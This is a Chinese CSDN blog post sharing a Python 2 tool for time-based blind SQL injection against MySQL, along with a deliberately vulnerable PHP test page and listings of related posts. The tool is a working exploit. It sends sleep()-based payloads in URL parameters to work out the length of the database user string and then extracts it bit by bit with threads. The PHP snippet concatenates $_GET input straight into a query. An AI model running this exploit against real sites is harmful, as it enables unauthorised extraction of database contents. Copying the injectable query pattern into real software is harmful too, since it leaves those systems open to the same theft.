python mysql延时注入_延迟注入工具(python)

最新推荐文章于 2022-11-30 22:02:53 发布
最新推荐文章于 2022-11-30 22:02:53 发布
阅读量144 收藏
点赞数
文章标签: python mysql延时注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39966765/article/details/113398801
版权

延迟注入工具(python)

#!/usr/bin/env python

# -*- coding: utf-8 -*-

# 延迟注入工具

import urllib2

import time

import socket

import threading

import requests

class my_threading(threading.Thread):

def __init__(self, str,x):

threading.Thread.__init__(self)

self.str = str

self.x = x

def run(self):

global res

x=self.x

j = self.str

url = "http://localhost/pentest/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"

html = request(url)

verify = 'timeout'

if verify not in html:

res[str(j)] = 0

#print 1

else:

res[str(j)] = 1

def request(URL):

user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS  10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }

req = urllib2.Request(URL, None, user_agent)

try:

request = urllib2.urlopen(req,timeout=2)

except Exception ,e:

time.sleep(2)

return 'timeout'

return request.read()

def curl(url):

try:

start = time.clock()

requests.get(url)

end = time.clock()

return int(end)

except requests.RequestException as e:

print u"访问出错!"

exit()

def getLength():

i = 0

while True:

print "[+] Checking: %s \r" %i

url = "http://localhost/pentest/1.php?username='+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"

html = request(url)

verify = 'timeout'

if verify in html:

print u"[+] 数据长度为: %s" %i

return i

i = i + 1

def bin2dec(string_num):

return int(string_num, 2)

def getData(dataLength):

global res

data = ""

for x in range(dataLength):

x = x + 1

#print x

threads = []

for j in range(8):

result = ""

j = j + 1

sb = my_threading(j,x)

sb.setDaemon(True)

threads.append(sb)

#print j

for t in threads:

t.start()

for t in threads:

t.join()

#print res

tmp = ""

for i in range(8):

tmp = tmp + str(res[str(i+1)])

#print chr(bin2dec(tmp))

res = {}

result = chr(bin2dec(tmp))

print result

data = data + result

sb = None

print "[+] ok!"

print "[+] result:" + data

if __name__ == '__main__':

stop = False

res = {}

length = getLength()

getData(length)

6768bf0737766fde329d006d275c835c.png

可以搞一定复杂的环境

php脚本 修改一下

/** 延迟注入测试*/header("Content-type:text/html;charset=utf8");$link = mysql_connect("localhost", "","123456");_select_db("", $link);mysql_set_charset("utf8");$sql = "SELECT user FROM user where user='{$_GET['username']}'";echo $sql;$query = _query($sql);echo "123123123";?>

weixin_39966765
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python mysql延时注入_Python:SQLMap源码精读之基于时间的盲注(time-based blind)
weixin_42297665的博客
02-02 578
基于时间的盲注(time-basedblind)测试应用是否存在SQL注入漏洞时,经常发现某一潜在的漏洞难以确认。这可能源于多种原因,但主要是因为Web应用未显示任何错误,因而无法检索任何数据。对于这种情况,要想识别漏洞,向数据库注入时间延迟并检查服务器响应是否也已经延迟会很有帮助。时间延迟是一种很强大的技术,Web服务器虽然可以隐藏错误或数据,但必须等待数据库返回结果,因此可用它来确认是否存在...
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类型:直列注入延时...
延迟注入工具python
weixin_30825581的博客
04-20 275
延迟注入工具python) #!/usr/bin/env python # -*- coding: utf-8 -*- # 延迟注入工具 import urllib2 import time import socket import threading import requests class my_threading(threading.Thread): de...
Python编写SQL注入工具(3)
diaotuanao1650的博客
11-21 365
Mysql注入模块 #coding:gb2312 import urllib import string import binascii import re class mysqlInject(): def __init__(self,url): self.db='database()' self.url=url #待检...
python mysql延时注入,Python系列之——时间盲注脚本编写
weixin_39670857的博客
03-25 329
[Python] 纯文本查看 复制代码#!/usr/bin/env python# -*- coding: utf-8 -*-import requestsimport timepayloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.' #匹配用的字符串user='' #存匹配到的字符的字...
基于时间延迟Python验证脚本
08-05 298
自己写的一段Python脚本,经常拿来验证一些sqlmap等工具跑不出数据的网站。 GET类型: import urllib import urllib2 import time payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' header = { 'User-Agent' : 'Mozilla/4.0 (comp...
douban_eem.rar_python工具_reading
09-19
标题 "douban_eem.rar_python工具_reading" 暗示了这是一个使用Python编程语言编写的爬虫程序,目标是抓取豆瓣阅读(Douban Reading)平台上的信息。这个压缩包可能包含了实现该功能所需的全部代码和相关资源。 ...
weibo_spider_爬虫python_关键词爬虫_python_python爬虫_spider
09-11
本项目“weibo_spider_爬虫python_关键词爬虫_python_python爬虫_spider”聚焦于利用Python实现一个分布式微博爬虫,它能有效地抓取微博平台上的大量数据,并且支持关键词搜索,帮助用户获取感兴趣的信息。...
精选_python爬取天气_源码打包
03-10
Python是一种广泛应用于各种领域的编程语言,特别是在数据处理、科学计算和Web开发方面。在这个"精选_python爬取天气_源码打包"中,我们关注的是Python在爬虫技术上的应用,特别是用于获取天气信息的源代码。 爬虫...
python3 sleep 延时秒 毫秒实例
09-16
Python编程语言中,`time.sleep()` 函数是用于实现程序暂停执行一段时间的关键工具,尤其在需要等待某个事件发生或避免过于频繁的操作时非常有用。这个函数来自Python的标准库`time`模块,允许程序员精确控制程序...
python测试mysql写入性能完整实例
09-09
主要介绍了python测试mysql写入性能完整实例,具有一定借鉴价值,需要的朋友可以参考下
python mysql延时注入_python延迟注入
weixin_42502075的博客
01-28 316
如果要爆数据啥的话就改py代码里面的select%20user(),替换为你要执行的sql即可[cc lang="python"]#!/usr/bin/env python# -*- coding: utf-8 -*-# 延迟注入工具import urllib2import timeimport socketimport threadingimport requestsclass my_threa...
py延迟注入SQL脚本
angaoux03775的博客
03-05 349
延迟注入工具python) #!/usr/bin/env python # -*- coding: utf-8 -*- # 延迟注入工具 import urllib2 import time import socket import threading import requests class my_threading(threading.Thread): ...
时间延迟注入 py脚本
weixin_42819368的博客
04-23 499
import requests import string url = "http://172.16.88.33/Less-5/" ##url = raw_input("Input url :") def sql_sleep(url): try: res = requests.get(url,timeout=3) return res.text except Exception as ...
Python----POC到EXP(requests模块、python脚本实现布尔盲注、延时注入
Pluto.的博客
12-27 2397
文章目录Python一、编写EXP1. requests模块- 概述- 支持HTTP的方法- requests使用HTTP方法- 参数- 对象对应的方法2. 快速开始3. 相关操作- 定制头部- 超时- GET传参- POST传参- 上传文件- 重定向- cookie4. py脚本实现布尔盲注5. py脚本实现延时注入- sys.argv[ ] Python 一、编写EXP EXP是漏洞利用工具; 基础环境Python3,核心模块requests。 1. requests模块 - 概述 requests
SQL 盲注GET /POST、布尔型,延时Python脚本
小锤队长的博客
08-09 4292
以下脚本都用 sql-labs 中的题目进行测试: sql-labs 靶场:http://43.247.91.228:84/ 一,sql注入之 GET传参 之 布尔型: import requests result = "" url_template = "http://43.247.91.228:84/Less-8/?id=2' and ascii(substr(({0}),{1...
python mysql延时注入,突破延时注入的时间限制-python
weixin_39826089的博客
03-25 140
# -*- coding: utf-8 -*-import requestsimport threadingimport datetime# 公用函数获取数据库,版本,用户名的的长度,参数getType为,user(),database(),version(),length = 0def loadDataPublicLength(url,i,getType,afterstr):if isTrue(...
python sql延时注入脚本(从数据库名到字段)
m0_61815757的博客
04-13 2664
python sql延时盲注脚本
python实现自动化延迟注入-时间盲注脚本-源代码
最新发布
qq_54037445的博客
11-30 1607
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注。
Python实现的信息安全语义搜索引擎
"基于python的信息安全领域中语义搜索引擎源码数据库.docx" 本文将探讨一个基于Python技术构建的语义搜索引擎项目,该搜索引擎专为信息安全领域设计,旨在提高信息搜索的效率和服务效果。项目名为“爬虫安全牛”,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值